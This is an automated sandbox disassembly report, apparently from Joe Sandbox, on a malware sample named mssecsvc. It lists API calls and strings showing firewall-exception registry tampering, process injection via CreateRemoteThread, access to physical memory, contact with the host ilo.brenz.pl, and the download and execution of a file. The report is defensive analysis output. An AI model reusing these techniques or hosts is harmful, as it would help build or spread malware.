Instruction Fuzzy Hash: DEE1E171909358BFEB229F648C4EBEA7BACEF41304F404659E84A9E081D6F46F05C7A5

Function 00AD3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00AD3D2B), ref: 00AD3D36

Part of subcall function 00AD3D4B: GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
Part of subcall function 00AD3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
Part of subcall function 00AD3D4B: GetTickCount.KERNEL32 ref: 00AD3D93
Part of subcall function 00AD3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AD6EF6,00000000,00000000,00000000,00000000), ref: 00AD3E65

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3734769084-1603237609
Opcode ID: 6f01ac3ceebeb8875c516713d47fef36de49695922c4d05a487e9876f0f81099
Instruction ID: 6c7ed1afa3fa3e8a03bc4c215442ce4eb30ac50844100e9f868514eb234681f7
Opcode Fuzzy Hash: 6f01ac3ceebeb8875c516713d47fef36de49695922c4d05a487e9876f0f81099
Instruction Fuzzy Hash: 2ED1D272504248BFEF35AF24CC0ABEA7BACEF45300F04455AE94A9E282D6F45F45C766

Function 7FE33D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33D2B), ref: 7FE33D36

Part of subcall function 7FE33D4B: GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
Part of subcall function 7FE33D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
Part of subcall function 7FE33D4B: GetTickCount.KERNEL32 ref: 7FE33D93
Part of subcall function 7FE33D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE36EF6,00000000,00000000,00000000,00000000), ref: 7FE33E65

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3734769084-1603237609
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: a7ac5dbc44a0a7f076254047d33bc2984391a345398ee75791b03206c519b35d
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: 83D1E171909348BFEB219F64CC0EBEA7BACEF41304F804659E84A9E081D6F46F45C765

Function 00AD3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00AD3D41), ref: 00AD3D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AD3D5F
GetTickCount.KERNEL32 ref: 00AD3D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AD6EF6,00000000,00000000,00000000,00000000), ref: 00AD3E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 00AD3EE2
wsprintfA.USER32 ref: 00AD3EF7
CreateThread.KERNEL32(00000000,00000000,00AD3691,00000000,00000000), ref: 00AD3F40
CloseHandle.KERNEL32(?,780B832E), ref: 00AD3F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AD3FE9
CloseHandle.KERNEL32(?,00000000), ref: 00AD3FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AD3FFF
socket.WS2_32(00000002,00000001,00000000), ref: 00AD4097
connect.WS2_32(6F6C6902,00AD3B09,00000010), ref: 00AD40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AD40FB
wsprintfA.USER32 ref: 00AD4179
SetEvent.KERNEL32(0000065C,?,00000000), ref: 00AD42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 00AD42F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 00AD430A

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3EF6, 00AD3F08
020a00 . . :#73204497e +*, xrefs: 00AD3EDF, 00AD3EF4, 00AD3F0B, 00AD4195, 00AD41DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AD3F0C
D s, xrefs: 00AD414F
ADVAPI32.DLL, xrefs: 00AD3D5E

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1567941233-1603237609
Opcode ID: 37f71bab4d2de818bdccc00d64875a05fb76d33de7a3105dbbaf66ef052a4c57
Instruction ID: d354d07b5a5fb5547a8567dd56e549f430ba9d8e3108baa0f138abfb6002aba7
Opcode Fuzzy Hash: 37f71bab4d2de818bdccc00d64875a05fb76d33de7a3105dbbaf66ef052a4c57
Instruction Fuzzy Hash: 2FE1E072504258BFEF35AF248C0ABEA7BACEF45300F00455AED4A9E282D6F45F45C766

Function 7FE33D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE33D41), ref: 7FE33D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE33D5F
GetTickCount.KERNEL32 ref: 7FE33D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE36EF6,00000000,00000000,00000000,00000000), ref: 7FE33E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE33EE2
wsprintfA.USER32 ref: 7FE33EF7
CreateThread.KERNEL32(00000000,00000000,7FE33691,00000000,00000000), ref: 7FE33F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE33F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE33FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE33FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE33FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE34097
connect.WS2_32(6F6C6902,7FE33B09,00000010), ref: 7FE340B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE340FB
wsprintfA.USER32 ref: 7FE34179
SetEvent.KERNEL32(0000065C,?,00000000), ref: 7FE342D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE342F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 7FE3430A

Strings

D s, xrefs: 7FE3414F
ADVAPI32.DLL, xrefs: 7FE33D5E
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33EF6, 7FE33F08
020a00 . . :#73204497e +*, xrefs: 7FE33EDF, 7FE33EF4, 7FE33F0B, 7FE34195, 7FE341DB
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE33F0C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1567941233-1603237609
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: b88bd265af381b496eeddd5cdecf50129738a0f978c3d376e89e404c10fc5b39
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: 10E1D071909358BFEB219F248C4DBEA7BACEF41304F804659E84A9E081D6F46F05D7A1

Function 7FE3042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE304BE
GetVersion.KERNEL32 ref: 7FE30500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FE30528
CloseHandle.KERNEL32(?), ref: 7FE305AD

Strings

\BaseNamedObjects\tghtVt, xrefs: 7FE30708
csrs, xrefs: 7FE3082C
\BaseNamedObjects\tghtVt, xrefs: 7FE30709, 7FE3072C, 7FE3073A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\tghtVt$\BaseNamedObjects\tghtVt$csrs
API String ID: 3017432202-2040488002
Opcode ID: f890454a24b3513c1b55c4f80a054a355f1c355fc5fef7395a7dd97704e0407a
Instruction ID: f2d113da4df35a7fcca010c4e176bb18e29a9ec588c9818d7ed7b04041dcc662
Opcode Fuzzy Hash: f890454a24b3513c1b55c4f80a054a355f1c355fc5fef7395a7dd97704e0407a
Instruction Fuzzy Hash: 1FB19071905349FFEB229F24C80DBEA3BA9EF45719F400128EA4A9E191C7F0AB45CB55

Function 7FE305F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 7FE305AD
GetModuleHandleA.KERNEL32(7FE305EC), ref: 7FE305F2
lstrcpyW.KERNEL32(\BaseNamedObjects\tghtVt,\BaseNamedObjects\tghtVt,?,?,?,?), ref: 7FE3070A
lstrcpyW.KERNEL32(\BaseNamedObjects\tghtVt,?), ref: 7FE3072D
lstrcatW.KERNEL32(\BaseNamedObjects\tghtVt,\tghtVt), ref: 7FE3073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FE3076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE30786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE307C9
Process32First.KERNEL32 ref: 7FE307DC
Process32Next.KERNEL32 ref: 7FE307ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE30805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE30842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE3085D
CloseHandle.KERNEL32 ref: 7FE3086C

Strings

\BaseNamedObjects\tghtVt, xrefs: 7FE30708
csrs, xrefs: 7FE3082C
\BaseNamedObjects\tghtVt, xrefs: 7FE30709, 7FE3072C, 7FE3073A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\tghtVt$\BaseNamedObjects\tghtVt$csrs
API String ID: 1545766225-2040488002
Opcode ID: e7aba79f75a4323e5cb79a812cd71f4cf66a4d1f1c27252f97298980dbdbaa5f
Instruction ID: 0518e73c093add547ba7f941b21faa3ae2e3e59a7359f80f6947c9b6bdf28503
Opcode Fuzzy Hash: e7aba79f75a4323e5cb79a812cd71f4cf66a4d1f1c27252f97298980dbdbaa5f
Instruction Fuzzy Hash: 84716D31905205FFEB219F10CC4DBAE3BBDEF45719F900028EA0A9E090C7B5AB45DB59

Function 00AD4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AD4057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AD4066
socket.WS2_32(00000002,00000001,00000000), ref: 00AD4097
connect.WS2_32(6F6C6902,00AD3B09,00000010), ref: 00AD40B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 00AD40FB
wsprintfA.USER32 ref: 00AD4179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AD41B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,00AD6AA2,00000000,00000000), ref: 00AD41BD
GetTickCount.KERNEL32 ref: 00AD41F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00AD6AA2,00000000,00000000), ref: 00AD428B
GetTickCount.KERNEL32 ref: 00AD4294
closesocket.WS2_32(6F6C6902), ref: 00AD42B8
SetEvent.KERNEL32(0000065C,?,00000000), ref: 00AD42D6
Sleep.KERNEL32(00007530,?,00000000), ref: 00AD42F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 00AD430A

Strings

020a00 . . :#73204497e +*, xrefs: 00AD4178, 00AD4195, 00AD41DB
D s, xrefs: 00AD414F

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s
API String ID: 883794535-1659677742
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 730758dc2df67dfcddc1a0d2c75b35c581affec3b887407ac7c867a06e42359c
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 3E71CC71508258BBEF319F28881D7EE7BADAF59310F14060AE85B9E281C7F45F81C765

Function 7FE34178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE34057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE34066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE34097
connect.WS2_32(6F6C6902,7FE33B09,00000010), ref: 7FE340B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE340FB
wsprintfA.USER32 ref: 7FE34179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE341B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE36AA2,00000000,00000000), ref: 7FE341BD
GetTickCount.KERNEL32 ref: 7FE341F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FE36AA2,00000000,00000000), ref: 7FE3428B
GetTickCount.KERNEL32 ref: 7FE34294
closesocket.WS2_32(6F6C6902), ref: 7FE342B8
SetEvent.KERNEL32(0000065C,?,00000000), ref: 7FE342D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE342F7
ResetEvent.KERNEL32(0000065C,?,00000000), ref: 7FE3430A

Strings

D s, xrefs: 7FE3414F
020a00 . . :#73204497e +*, xrefs: 7FE34178, 7FE34195, 7FE341DB

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s
API String ID: 883794535-1659677742
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: 850ec88f172df83ebb353721f3422d42715e6605cffb608ae3a4e47bcf9ad285
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: 9B71BC75908358BAEB219F348C1CBDEBFAEEF81314F444608E89A9E181C7F46B45C765

Function 00AD33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AD344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AD3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AD3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AD34A0
UnmapViewOfFile.KERNEL32(?), ref: 00AD34B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3414
\Device\PhysicalMemory, xrefs: 00AD33E0

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: ddfc636e6dc0ab4b21d6e837ee94b5ca1466fbfad68d09e9c6a5c847798fe22b
Instruction ID: ff8af5f2ab3c54be97760de0e13a36cd877da4d44b8835ff07f330ff634fe8d6
Opcode Fuzzy Hash: ddfc636e6dc0ab4b21d6e837ee94b5ca1466fbfad68d09e9c6a5c847798fe22b
Instruction Fuzzy Hash: B8819AB2500208FFEB248F15CC89AAA3BBCFF44701F504659ED1A9B291D7F4AF45CA65

Function 7FE333E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE3344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE33469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE33493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE334A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE334B8

Strings

\Device\PhysicalMemory, xrefs: 7FE333E0
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33414

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: 09b820f866d5db72f37fd3c3c6a9cd7387b403e5a0efbf29bc8aeae6eafba6ec
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 61817871900208FFEB218F14CC89EAA3BADEF44714F914618ED5A9B295D3F0AF45CB64

Function 00AD3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AD344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AD3469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AD3493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AD34A0
UnmapViewOfFile.KERNEL32(?), ref: 00AD34B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 00AD3414
ysic, xrefs: 00AD3450, 00AD3466

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: dc84df94b2327313a4315dacbd6cd82d21bade99a101226502bbab10ea47d6d6
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: FA115B71140608BBEB24CF14CC59FAA367CEF88704F50451DEA1A9A2D0E7F4AF148A69

Function 7FE33405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE3344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE33469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE33493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE334A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE334B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE33414
ysic, xrefs: 7FE33450, 7FE33466

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: 24d4086a74938baf465c40eea0b54c9f0d3c2e8599ea3efd14b02b2edd75b507
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: 5B115B74540708BFEB21CF10CC59FAA367DEF88704F51451CEA1A9A290E7F86F188A68

Function 00AD27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,00AD27A3,00000000,?), ref: 00AD27A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AD27A3,00000000,?), ref: 00AD27C3
InternetReadFile.WININET(?,?,00000104), ref: 00AD27DD
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AD27A3,00000000,?), ref: 00AD27F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AD27A3,00000000,?), ref: 00AD27FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AD27A3), ref: 00AD2823
InternetCloseHandle.WININET(?), ref: 00AD2833
InternetCloseHandle.WININET(00000000), ref: 00AD283A

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
String ID:
API String ID: 3452404049-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 416d2b4848a56c1fa22eaecf65b4348e612d37d2b0875e3b49858f3f53f6a9d3
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: FE116DB1100606BBEB350B20CC4AFFF7A2DEF94B10F004519FA0699180DBF59E5196A8

Function 7FE34C9E Relevance: 8.4, Strings: 6, Instructions: 887COMMON

Download Yara Rule

Strings

@, xrefs: 7FE35118
(, xrefs: 7FE359A4
&, xrefs: 7FE35611
&, xrefs: 7FE35617
nr, xrefs: 7FE34D32
!, xrefs: 7FE34D6A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$MappingView
String ID: !$&$&$($@$nr
API String ID: 1961427682-1764398444
Opcode ID: e19ae817f8f1e491b84cd3cf53e4234cfbd072e64c7b37fefbfdf66b025fc5a6
Instruction ID: a612cbefa8840bfdb1d1d06307b3a9250889556ac90b50da4d421afba4f00183
Opcode Fuzzy Hash: e19ae817f8f1e491b84cd3cf53e4234cfbd072e64c7b37fefbfdf66b025fc5a6
Instruction Fuzzy Hash: 4B822431D0530AEFDB26CF28C84D7997BBAEF41328F944619C85A4F285D3B4AB50CB81

Function 00AD24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\tghtVt), ref: 00AD24BA
lstrlenW.KERNEL32(?), ref: 00AD24C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00AD2516

Strings

\BaseNamedObjects\tghtVt, xrefs: 00AD24B8

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\tghtVt
API String ID: 2597515329-4135269492
Opcode ID: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction ID: 583789693dee641d0405d924fb645bf346b526b03582aa669f9b2987fe1b64ff
